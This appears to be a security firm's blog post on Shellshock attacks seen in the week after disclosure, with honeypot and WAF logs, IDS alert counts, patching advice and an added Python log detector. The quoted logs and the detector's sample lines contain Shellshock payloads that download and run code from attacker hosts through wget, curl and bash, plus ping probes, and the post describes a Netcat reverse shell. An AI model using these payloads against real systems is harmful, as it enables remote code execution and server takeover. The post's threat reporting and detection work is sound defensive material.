
Shellshock a Week Later: What We Have Seen

Trustwave, like most other information security firms, has been busy investigating the Shellshock vulnerability and the scanning and exploit attempts that followed its disclosure. The SpiderLabs team at Trustwave wanted to give the community some feedback on what we are seeing "in the wild" and a status update on the detection and protection coverage in the relevant Trustwave services and products.

Attacks in the Wild

Honeypot Alerts

The first indications of scanning and exploit attempts came from our web-based honeypot systems early on September 25, just after the public announcement of the vulnerability. As these Apache access_log entries show, attackers were scanning sites by placing the attack payload in either the Referer or the User-Agent request header:

162.253.66.76 - - [25/Sep/2014:00:24:27 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:35 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:35 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
162.253.66.76 - - [25/Sep/2014:00:24:37 -0400] "GET / HTTP/1.0" 400 226 "() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod 777 /tmp/besh; /tmp/besh;" "Thanks-Rob"
209.126.230.72 - - [25/Sep/2014:00:47:40 -0400] "GET / HTTP/1.0" 200 10303 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
209.126.230.72 - - [25/Sep/2014:03:13:23 -0400] "GET / HTTP/1.0" 200 2564 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
209.126.230.72 - - [25/Sep/2014:03:14:26 -0400] "GET / HTTP/1.0" 200 16 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:03:43:04 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:03:49:19 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:03:50:17 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
209.126.230.72 - - [25/Sep/2014:05:59:22 +0900] "GET / HTTP/1.0" 200 22231 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:06:35:21 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 - "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - ...

While this data is useful, it is limited to what the default Apache combined log format records. Looking at full HTTP transactions in the ModSecurity WAF audit log format reveals more interesting header attacks, including payloads carried in cookies and in custom headers:

cookie: () { :; }; /bin/bash -c 'rm /tmp/._tmp; uu="x5w3h5abg6"; up="5KWqDPzkwO"; u="http://82.118.242.208:8009/?ii=13f15d9c98ccd171e9e41638da29ed5c&ij=aHR0cDovL21vZHNlY3VyaXR5Lm9yZy8%3D"; curl -u $uu:$up $u | /bin/bash; lwp-request -m POST -H 'Authorization: Basic eDV3M2g1YWJnNjo1S1dxRFB6a3dP' $u | /bin/bash; wget -O- --http-user $uu --http-password $up $u | /bin/bash'
variable-auth_method: () { :; }; /bin/bash -c 'rm /tmp/._tmp; uu="x5w3h5abg6"; up="5KWqDPzkwO"; u="http://82.118.242.208:8009/?ii=13f15d9c98ccd171e9e41638da29ed5c&ij=aHR0cDovL21vZHNlY3VyaXR5Lm9yZy8%3D"; curl -u $uu:$up $u | /bin/bash; lwp-request -m POST -H 'Authorization: Basic eDV3M2g1YWJnNjo1S1dxRFB6a3dP' $u | /bin/bash; wget -O- --http-user $uu --http-password $up $u | /bin/bash'

As you can see, these requests are either attempts to confirm that a host is vulnerable (for example, by making it ping back to the attacker) or actual exploit attempts that download and execute malware.
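The following is an added example, not code from the original post or from Trustwave: a small detector for the two log shapes shown above. It recognises the Shellshock function-definition prefix in the Referer and User-Agent fields of Apache combined log lines and in bare "header: value" lines such as the ModSecurity cookie entry, and labels each hit by the kind of command that follows the prefix (ping probe, download-and-execute, netcat reverse shell). The sample lines, addresses and paths are constructed for the example.

```python
import re
from dataclasses import dataclass

# Shellshock function-definition prefix; matches both "() { :; };" and "() { :;};".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:;?\s*\}\s*;\s*(?P<body>.*)")

# Apache combined log format: the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Coarse intent labels, checked in order, reflecting the commands seen in the captures.
INTENT = [("download-and-execute", r"\b(wget|curl|lwp-request)\b"),
          ("reverse-shell", r"\bnc\b|/dev/tcp/"),
          ("probe", r"\b(ping|echo|cat)\b")]

@dataclass
class Hit:
    src: str    # client IP, or "-" for a bare header line
    field: str  # header that carried the payload
    kind: str   # intent label from INTENT
    body: str   # command following the function prefix

def classify(body: str) -> str:
    return next((k for k, pat in INTENT if re.search(pat, body)), "unknown")

def scan_line(line: str) -> list[Hit]:
    """Return one Hit per header field carrying the Shellshock prefix."""
    m = COMBINED_RE.match(line)
    if m:
        src, fields = m["src"], {"referer": m["referer"], "user-agent": m["ua"]}
    else:
        # ModSecurity audit-log style "header-name: value" line (e.g. cookie)
        name, sep, value = line.partition(":")
        if not sep:
            return []
        src, fields = "-", {name.strip().lower(): value.strip()}
    return [Hit(src, name, classify(s["body"]), s["body"].strip())
            for name, value in fields.items()
            if (s := SHELLSHOCK_RE.search(value))]

# Constructed sample lines modelled on the page's logs (RFC 5737 test addresses).
SAMPLE_LINES = [
    '192.0.2.10 - - [25/Sep/2014:00:24:27 -0400] "GET / HTTP/1.0" 400 226 '
    '"() { :; }; wget -O /tmp/x http://192.0.2.10/x; chmod 777 /tmp/x; /tmp/x;" "Thanks-Rob"',
    '192.0.2.20 - - [25/Sep/2014:03:43:04 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" '
    '404 - "-" "() { :;}; /bin/ping -c 1 192.0.2.21"',
    "cookie: () { :; }; /bin/bash -c 'curl http://192.0.2.40/p | /bin/bash'",
]
```

Running `scan_line` over each of `SAMPLE_LINES` yields a download-and-execute hit in the Referer, a probe hit in the User-Agent, and a download-and-execute hit in the cookie header; a benign line yields no hits.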

Trustwave Web Application Firewall (WAF) Research Deployments

In addition to our web honeypots, which run ModSecurity, Trustwave SpiderLabs also has access to research deployments of the Trustwave Web Application Firewall (WAF) product. The WAF already has built-in attack payload detection for OS command injection that catches the vast majority of these payloads (echo, cat, ping and so on). On top of that default protection, we wanted to see exploit attempts specific to this vulnerability, so we quickly added this "User Defined Rule":

[Screenshot: Trustwave WAF user-defined rule for Shellshock]

Let's take a closer look at a few alert examples taken from our Trustwave WAF research deployment.

Proof of Concept (PoC) Scanning

[Screenshot: Trustwave WAF alert, proof-of-concept scan]

This client seems to only be testing whether the exploit works.

"Helpful" PoC Scanning

[Screenshot: Trustwave WAF alert, "helpful" proof-of-concept scan]

This client is going a step further by trying to notify the website owner that their site may be vulnerable to Shellshock and refers to their website for more information.

Vulnerable Host Enumeration

[Screenshot: Trustwave WAF alert, vulnerable host enumeration]

This example attack is interesting for two reasons:

  1. The attack source was in China, and
  2. The attack payload appeared to be part of an effort to map the internet for vulnerable hosts (the Host headers were IP addresses rather than names) in preparation for some later attack.

Reverse Shell Tunneling

[Screenshot: Trustwave WAF alert, Netcat reverse shell attempt]

This client from Brazil was attempting to use Netcat to send back a reverse shell to their address.

IDS Alerts from Trustwave Managed Security Services (MSS)

In addition to our WAF products, Trustwave Managed Security Services (MSS) also saw a huge spike in attack traffic for this vulnerability since September 25:

  • SID 31978: 560 alerts
  • SID 4100272: 7,834 alerts

[Chart: Trustwave MSS IDS alert volume for Shellshock since September 25]

Attack Source Analysis

Attack source attribution is challenging because attackers often route their traffic through Tor, anonymous proxy servers or compromised systems, so the true origin of an attack could be anywhere. Our attack source analysis did show that Tor is actively being used to send attack traffic.

Protections and Detections for Trustwave Customers

For more information about Shellshock and Trustwave products and services that can help detect or protect against attacks on the vulnerability, visit the Trustwave blog.

Conclusion

As the data in this blog post illustrates, the threat level for this vulnerability is high due to the prevalence of the vulnerability and the large number of active exploit attempts in the wild. We urge all Trustwave customers to do the following:

  • Patch - Apply all relevant patches from vendors to update bash.
  • Identify - Leverage vulnerability scanners to help determine which systems are vulnerable to known attack vectors. Trustwave will continue to add detection and protection signatures as research progresses.
  • Protect - Protect systems from attack attempts with security products such as IDS/IPS and WAF.

Trustwave will continue to monitor this vulnerability and update protections and detections as needed.

Stay safe out there.

I would like to thank the following SpiderLabs Research team members who helped to ensure that their respective products were updated and also gathered threat intelligence for this blog post:

  • Oren Hafif - Researcher for Trustwave WAF
  • James Espinosa - Researcher for Trustwave IDS/IPS
  • Jonathan Claudius - Lead Security Researcher for Trustwave Vulnerability Management
  • Abhishek Rahirkar - Researcher for Trustwave App Scanner
  • Jeff Pold - Director of Security Information Services for Trustwave SIEM

Additional Resources

Webinar—Trustwave on Shellshock: What You Need to Know
